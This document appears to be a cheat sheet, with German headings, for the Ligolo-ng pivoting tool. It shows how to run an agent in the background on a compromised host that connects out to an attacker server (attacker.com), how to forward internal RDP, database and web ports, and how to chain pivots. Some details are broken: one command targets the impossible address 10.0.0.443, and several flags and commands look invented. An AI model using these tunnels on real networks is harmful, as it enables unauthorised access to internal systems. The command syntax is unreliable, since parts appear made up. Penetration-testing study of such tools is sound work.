Ligolo-ng
Installation
Linux/macOS
# Download latest release
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.10/ligolo-ng_0.4.10_Linux_x86_64.tar.gz
# Extract
tar -xzf ligolo-ng_0.4.10_Linux_x86_64.tar.gz
# Make executable
chmod +x ligolo-ng
# Move to PATH
sudo mv ligolo-ng /usr/local/bin/
# Verify installation
ligolo-ng -hWindows
# Download from releases
Invoke-WebRequest -Uri "https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.10/ligolo-ng_0.4.10_Windows_x86_64.zip" -OutFile "ligolo.zip"
# Extract
Expand-Archive ligolo.zip
# Or download manually from GitHub releases page
# Add to PATH if neededMit Docker
# Build from source
git clone https://github.com/nicocha30/ligolo-ng.git
cd ligolo-ng
docker build -t ligolo-ng .
# Run proxy
docker run -it -p 11601:11601 ligolo-ng ./ligolo-ng -bind 0.0.0.0:11601 -selfcertArchitektur-Übersicht
Komponenten
┌─────────────────────┐
│ Attacker Machine │
│ (Proxy Server) │
│ ligolo-ng proxy │
│ :11601 (listener) │
└────────────┬────────┘
│ TLS/TCP
┌──────┴──────┐
│ Internet │
└──────┬──────┘
│
┌────────────▼────────────┐
│ Compromised Host │
│ (Pivot Point) │
│ ligolo-ng agent │
│ Connects to proxy │
│ Routes traffic │
└────────────┬────────────┘
│
┌────────────▼────────────┐
│ Internal Network │
│ Unreachable targets │
│ 10.0.0.0/8 │
└─────────────────────────┘Grundlegende Einrichtung
Proxy-Server (Attacker-Maschine)
# Generate self-signed certificate
ligolo-ng -gen-cert -cert-file=cert.pem -key-file=key.pem
# Start proxy listener
ligolo-ng -bind 0.0.0.0:11601 -cert=cert.pem -key=key.pem
# Or without cert (auto-generate)
ligolo-ng -bind 0.0.0.0:11601 -selfcert
# With custom network interface
ligolo-ng -bind 192.168.1.100:11601 -selfcert
# Specify log level
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4Agent (Kompromittierte Maschine)
# Connect to proxy
ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure
# With certificate verification
ligolo-ng -connect 192.168.1.100:11601 -ca-file=ca.pem
# Background execution
nohup ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure &
# Windows background execution
START /B ligolo-ng.exe -connect 192.168.1.100:11601 -tunnel-allow-insecureListener-Verwaltung
Listener erstellen
# Interactive mode - add listener
# In ligolo-ng CLI:
listener add --bind 0.0.0.0:3389 --to 10.0.0.5:3389
listener add --bind 0.0.0.0:80 --to 10.0.0.10:80
listener add --bind 127.0.0.1:5432 --to 10.0.0.20:5432
# Multiple listeners
listener add --bind 0.0.0.0:8080 --to 10.0.0.1:8080
listener add --bind 0.0.0.0:8081 --to 10.0.0.2:8080
listener add --bind 0.0.0.0:8082 --to 10.0.0.3:8080Listener-Befehle
# List active listeners
listener list
# Remove listener
listener remove --id=0
# View listener details
listener show --id=0
# Enable/disable listener
listener set --id=0 --enabled=false
listener set --id=0 --enabled=trueTunnel-Schnittstellen-Verwaltung
Netzwerkschnittstellen-Konfiguration
# List tunnel interfaces
interface list
# Create virtual interface (Linux)
interface add --name=tun0 --address=10.0.0.1/24
# Add interface to active tunnel
interface attach --id=0 --name=tun0
# View interface routing table
interface show --id=0
# Delete interface
interface delete --id=0 --name=tun0Routing-Konfiguration
# Add static route through tunnel
interface route add --id=0 --network=10.0.0.0/8 --via=10.0.0.1
# View routes
interface route list --id=0
# Remove route
interface route delete --id=0 --network=10.0.0.0/8
# Default gateway through tunnel
interface route add --id=0 --network=0.0.0.0/0 --via=10.0.0.1Praktische Tunneling-Szenarien
Szenario 1: RDP-Zugriff auf internen Server
# On attacker machine, start proxy
ligolo-ng -bind 0.0.0.0:11601 -selfcert
# On compromised machine, connect agent
ligolo-ng -connect attacker.com:11601 -tunnel-allow-insecure
# In proxy CLI, add RDP listener
listener add --bind 0.0.0.0:3389 --to 10.0.0.50:3389
# Connect RDP from attacker
rdesktop 127.0.0.1:3389
xfreerdp /v:127.0.0.1:3389 /u:admin /p:password
# Or via mstsc.exe on Windows
mstsc.exe /v:127.0.0.1:3389Szenario 2: Datenbankzugriff über Pivot
# Add SQL Server listener
listener add --bind 127.0.0.1:1433 --to 10.0.0.100:1433
# Connect via tools on attacker
sqlcmd -S 127.0.0.1,1433 -U admin -P password -d database
# Or use GUI tools
# DBeaver: New Connection > SQL Server > localhost:1433
# Verify connectivity
nmap -p 1433 127.0.0.1Szenario 3: Webanwendungszugriff
# Setup HTTP/HTTPS listeners
listener add --bind 0.0.0.0:8080 --to 10.0.0.80:80
listener add --bind 0.0.0.0:8443 --to 10.0.0.443:443
# Access via browser or curl
curl http://127.0.0.1:8080/
curl https://127.0.0.1:8443/ -k
# Burp Suite integration
# Burp > Proxy > Options > Upstream Proxy
# Server: 127.0.0.1, Port: 8080Szenario 4: Verkettetes Pivoting (Multi-Hop)
# First pivot setup
# Attacker -> Pivot1
# Pivot1 runs agent connecting to attacker
# From pivot1, discover internal network
# Add second pivot
listener add --bind 0.0.0.0:11602 --to 10.0.0.2:11601
# On internal machine, connect to pivot1
ligolo-ng -connect 10.0.0.1:11602 -tunnel-allow-insecure
# Now can route through both pivots
listener add --bind 0.0.0.0:3306 --to 10.0.0.100:3306Erweiterte Konfiguration
Interface-Routing (Linux)
# Create tun interface for all traffic
interface add --name=tun0 --address=10.0.0.1/24
# Route specific subnet
sudo route add -net 10.0.0.0/8 gw 10.0.0.1
# Or use ip command
sudo ip route add 10.0.0.0/8 via 10.0.0.1 dev tun0
# View routing table
sudo route -n
ip route show
# Add default route through tunnel (be careful!)
sudo ip route add 0.0.0.0/1 via 10.0.0.1 dev tun0Leistungsoptimierung
# Increase buffer sizes (in proxy config)
ligolo-ng -bind 0.0.0.0:11601 -selfcert -buf-size=65536
# Set goroutines limit
ligolo-ng -bind 0.0.0.0:11601 -selfcert -max-conns=1000
# Optimize for high-bandwidth tunnels
ligolo-ng -bind 0.0.0.0:11601 -selfcert -tls-version=1.3TLS-Konfiguration
# Using custom certificates
ligolo-ng -bind 0.0.0.0:11601 \
-cert=server.crt \
-key=server.key \
-ca=ca.crt
# Verify agent certificate
ligolo-ng -connect proxy.com:11601 \
-ca-file=ca.crt \
-cert-file=client.crt \
-key-file=client.keyFehlerbehebung
Verbindungsprobleme
# Test connectivity from agent to proxy
# On compromised machine
telnet attacker.com 11601
nc -zv attacker.com 11601
# Check firewall rules
# Linux
sudo iptables -L | grep 11601
sudo ufw status | grep 11601
# Windows
netsh advfirewall firewall show rule name=all | grep 11601Routing-Probleme
# Verify routes are active
listener list
interface list
# Test connectivity to internal server
# Through listener (from attacker)
telnet 127.0.0.1 3389
# Check MTU
ping -M do -s 1472 internal.server
# Enable verbose logging
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4Leistungsprobleme
# Monitor tunnel statistics
# In CLI: tunnel info
# Check agent health
# In CLI: agent list
# Reduce listener count if needed
listener remove --id=X
# Monitor network
# Linux
iftop -i tun0
nethogsSicherheits-Best-Practices
Zertifikatverwaltung
# Generate certificate with proper CN
openssl req -new -x509 -days 365 -nodes \
-out cert.pem -keyout key.pem \
-subj "/C=US/ST=State/L=City/O=Org/CN=proxy.domain.com"
# Verify certificate chain
openssl verify -CAfile ca.pem cert.pem
# Check certificate expiry
openssl x509 -in cert.pem -text -noout | grep "Not After"Netzwerk-Isolation
# Limit listener binding
listener add --bind 127.0.0.1:3389 --to 10.0.0.5:3389
# Only accessible from localhost
# Use firewall rules
sudo iptables -A INPUT -p tcp --dport 11601 -s attacker_ip -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 11601 -j DROPAnmeldedaten-Sicherheit
# Use authentication if available
# Check for auth mechanism in documentation
# Disable insecure mode in production
# Instead of: -tunnel-allow-insecure
# Use proper certificate-based auth
# Monitor tunnel activity
listener show --id=0CLI-Befehlsreferenz
# Listener commands
listener add --bind <BIND> --to <TARGET>
listener remove --id=<ID>
listener list
listener show --id=<ID>
# Interface commands
interface add --name=<NAME> --address=<ADDR/MASK>
interface list
interface attach --id=<ID> --name=<NAME>
interface delete --id=<ID> --name=<NAME>
interface route add --id=<ID> --network=<NET> --via=<GW>
interface route list --id=<ID>
# Agent commands
agent list
agent info --id=<ID>
agent close --id=<ID>
# General
help
exitReferenzen
Last updated: 2026-03-30